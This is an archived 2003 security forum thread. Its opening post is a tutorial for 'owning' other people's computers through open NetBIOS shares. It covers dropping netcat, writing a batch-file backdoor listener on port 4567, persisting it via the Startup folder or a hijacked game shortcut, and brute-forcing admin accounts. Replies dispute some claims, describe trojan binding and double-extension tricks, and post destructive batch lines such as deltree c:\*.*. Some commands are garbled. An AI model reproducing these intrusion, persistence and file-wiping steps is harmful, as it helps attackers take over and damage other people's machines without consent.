• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

owning a computer through netbios (my tut)

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses

View previous topic :: View next topic  
Author Message
andr3s
Just Arrived
Just Arrived


Joined: 04 Jan 2003
Posts: 0


Offline

PostPosted: Mon Jan 20, 2003 3:29 am    Post subject: owning a computer through netbios (my tut) Reply with quote

thought i might give back to the forum..i wrote this today..

-----------------------------------------

Owning a computer through NetBios:

This text is for informational purposes only, so don't blame me for what anybody does with this information.

This is my sixth tutorial so far, I hope you enjoy it. Basically I'm going to cover how to get the most out of shitty NetBios access.

1- Go read some of the tutorials on using NetBios.And have some understanding of command prompt (read my batchfile tutorial). These are all available in the text section.

2- Go NetBios a computer.

3- Go into a random folder and drop a copy of netcat (available in the download section). If it says that you only have read acces then go to problem 1 to see how to get read/write privileges.

4- Your'e gonna have to write a batch file. Go to notepad, then write something like this:

@echo off
cd C:\random_directory\ (doesn't have to be C:\, just whatever directory netcat is in")
nc -l -p 4567 | echo > cmd.exe (command.exe on anything less than NT)




5- If they have all of "C:\" shared (If they don't have C:\ shared go to problem 2 below) then simply got into "C:\Documents and Settings\" click on the user name (if there are more than one, pick the one with most priviledges or do this whole thing with each account). After you are in one of the user's folders click on the following folders "\Start Menu\Programs\Startup". By now the address of the folder you are in should be "C:\Documents and Settings\whatever_user_name\Start Menu\Programs\Startup". Now drop a copy of your batch file in there (read step 4).

6- Basically you just dropped a batch file that will make a backdoor in their computer in their startup folder. When their computer boots up it will be activated and your backdoor opened.

7- Run telnet and connect to their ip throught port 4567.

---------------------------Problem 1-----------------------------------

1- That sucks. Well in that case you will have to enumerate the accounts (check the downloads section for programs that do this) and bruteforce the account with the highest priviledges, root.

2- Log in as the admin and you'll have all the priviledges.

---------------------------Problem 2-----------------------------------



1- This is where it gets harder. Drop your batchfile (read section 4 above) somewhere in their computer.

2- Find a shortcut or something that theyre bound to use (i.e "warcraft 3") (if you can't fond one go to problem 3). Now right-click on the shortcut and change the target input to the location of your batch file (i.e "D:\shared music\evil.bat") and the start in field to the folder where your batch file is (i.e "D:\shared music\).

3- When they click on this shortcut it will activate the batch file, the batch file will then activate the backdoor.

---------------------------Problem 3-----------------------------------



1- This is tricky stuff. Get a file binder and bind your batch file to a file that you know the user will open (i.e an mp3).

2- When he uses that mp3 your batch file will be run.
Back to top
View user's profile Send private message Send e-mail Visit poster's website AIM Address
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Mon Jan 20, 2003 11:48 pm    Post subject: Re: owning a computer through netbios (my tut) Reply with quote

andr3s wrote:

1- This is tricky stuff. Get a file binder and bind your batch file to a file that you know the user will open (i.e an mp3).

2- When he uses that mp3 your batch file will be run.


Yeh real tricky, even *I* don't know how to bind a batch file to an mp3.

Please explain.

I'm sure if this tutorial is really useful here as it's very basic and doesn't explain any of the more advanced concepts of null sessions or enumeration.
Back to top
View user's profile Send private message Visit poster's website
ToddK
Just Arrived
Just Arrived


Joined: 29 Nov 2002
Posts: 0
Location: Ottawa, Canada

Offline

PostPosted: Tue Jan 21, 2003 1:58 am    Post subject: Reply with quote

Where are your other tutorials? It refers to them, but I can't find a link.

Also, I would like to know how that bining works. I can't think of a way. Does it need something specific installed or not patched?
Back to top
View user's profile Send private message Visit poster's website
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Tue Jan 21, 2003 11:36 am    Post subject: Reply with quote

ToddK wrote:

Also, I would like to know how that bining works. I can't think of a way. Does it need something specific installed or not patched?


He's talking arse, I just wanted to highlight that point though Smile
Back to top
View user's profile Send private message Visit poster's website
Madeline_13
Just Arrived
Just Arrived


Joined: 10 Jan 2003
Posts: 0


Offline

PostPosted: Tue Jan 21, 2003 12:17 pm    Post subject: Reply with quote

hey someone sent me a rar file with a bat file in it - actually i havent run it but I am wondering now if this file is infected. I ran a scan but you know I never trust that.
Back to top
View user's profile Send private message
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Tue Jan 21, 2003 12:23 pm    Post subject: Reply with quote

LOL you don't need to scan .bat files, just open them and read them..

That's assuming it is a batch file not something else renamed .bat.
Back to top
View user's profile Send private message Visit poster's website
Madeline_13
Just Arrived
Just Arrived


Joined: 10 Jan 2003
Posts: 0


Offline

PostPosted: Tue Jan 21, 2003 3:02 pm    Post subject: Reply with quote

thats what i meant. if it is something else likeyou just said...how could i know beforehand? bat file is supposed to be some files for a game ...and that kinda stuff is hard to trust
Back to top
View user's profile Send private message
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Tue Jan 21, 2003 3:08 pm    Post subject: Reply with quote

.bat files are nothing to do with games .bat files are batch files, a series of commands in a file.

Some cheesy warez rips use batch files to automate the extraction process.

If you don't trust it, open it and read it like I said, it's in plain text, it's just a series of commands like:

Code:
ECHO You are cl00less
deltree c:\*.* /s \y
ECHO You are f00ked.
Back to top
View user's profile Send private message Visit poster's website
ToddK
Just Arrived
Just Arrived


Joined: 29 Nov 2002
Posts: 0
Location: Ottawa, Canada

Offline

PostPosted: Tue Jan 21, 2003 6:27 pm    Post subject: Reply with quote

Actually, this may be just a confusion. I have only just started reading about security, but I notice that many links mention "binding" to a program using the cgibin. Usually the cmd.exe to get a command prompt.
Back to top
View user's profile Send private message Visit poster's website
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Tue Jan 21, 2003 6:36 pm    Post subject: Reply with quote

That's binding to a port generally, or piping from one program to another or piping cmd.exe to netcat mostly..

You can bind an executable or dll to another executable (that's how trojan stubs work), but you can't bind an executable to a non executable.

You could in effect bind an exe to the the default exe handler for Windows Explorer (this is what many viruses do) so everything you run, the virus/trojan runs aswell.

This took me hours once to fix by hand Shocked Twisted Evil Shocked

You could also bind something to whatever plays mp3's, generally Winamp, so that whenever it runs the other things runs too..

Or you can change the swap an mp3 for a bogus file with a double extension and a media icon..

But you can't bind a batch file to an mp3 (well you could, but the only thing that would happen is you would get some weird noises at the end of the song when you played the mp3).

Simple as that. Very Happy
Back to top
View user's profile Send private message Visit poster's website
decypherohm
Just Arrived
Just Arrived


Joined: 16 Nov 2002
Posts: 1
Location: World - Europe - Portugal - Lisbon

Offline

PostPosted: Tue Jan 21, 2003 8:14 pm    Post subject: Reply with quote

Easy and simply destrucktible .bat

Code:

@Echo Off
@Del c:\windows
@Echo You have just been erased.
Back to top
View user's profile Send private message Visit poster's website MSN Messenger
Tom Bair
SF Boss
SF Boss


Joined: 10 Aug 2002
Posts: 16776955
Location: Portland, Oregon USA

Offline

PostPosted: Tue Jan 21, 2003 8:52 pm    Post subject: Reply with quote

decypherohm wrote:
Easy and simply destrucktible .bat

Code:

@Echo Off
@Del c:\windows
@Echo You have just been erased.


Quickly, and just off the top of my head; I don't think your batch file would work. When issuing the Del command, does it not require a keypress of the Y key to continue?

Even with @Echo Off -- you will still receive a prompt of:

Do you wish to delete C:\Windows and all it's sub-directories?

At this point, the jig is up and the joke is on you. User hits "N" or the "ESC" key and sees You have just been erased..

Another trick to keep batch files from damaging your hard drive is to rename the FORMAT command to something else. Then when a batch file issues the ever popular FORMAT C:, a wonderful response from the OS is File not found.

Tom
Back to top
View user's profile Send private message Visit poster's website
Madeline_13
Just Arrived
Just Arrived


Joined: 10 Jan 2003
Posts: 0


Offline

PostPosted: Thu Jan 23, 2003 9:02 am    Post subject: Reply with quote

download americas army (your taxpayer dollars paid for it) after you dl all the parts theres a bat you run...and it sets up the install.. People are using that to hack accounts left and right. also blackhawk down demo has the same thing. No warez...this is actual companies putting it out like this. americas army is totally free forever to dl. I guess the army is "cheesy" then huh? they put it out. Thats how the game is run. People are putting out hacks for it same style...dumb peopel run them. I was just asking about it here. I guess you gotta play alot of games to really know whats going on though with what.
Back to top
View user's profile Send private message
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Thu Jan 23, 2003 11:29 am    Post subject: Reply with quote

Madeline_13 wrote:
download americas army (your taxpayer dollars paid for it) after you dl all the parts theres a bat you run...and it sets up the install.. People are using that to hack accounts left and right. also blackhawk down demo has the same thing. No warez...this is actual companies putting it out like this. americas army is totally free forever to dl. I guess the army is "cheesy" then huh? they put it out. Thats how the game is run. People are putting out hacks for it same style...dumb peopel run them. I was just asking about it here. I guess you gotta play alot of games to really know whats going on though with what.


Well like I said open it and read it Smile

It's in plain text.

a) I don't live in the US (thank the lord Twisted Evil )
b) I don't play demo's
c) I play a lot of games
d) Don't run anything you don't trust 100%
Back to top
View user's profile Send private message Visit poster's website
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register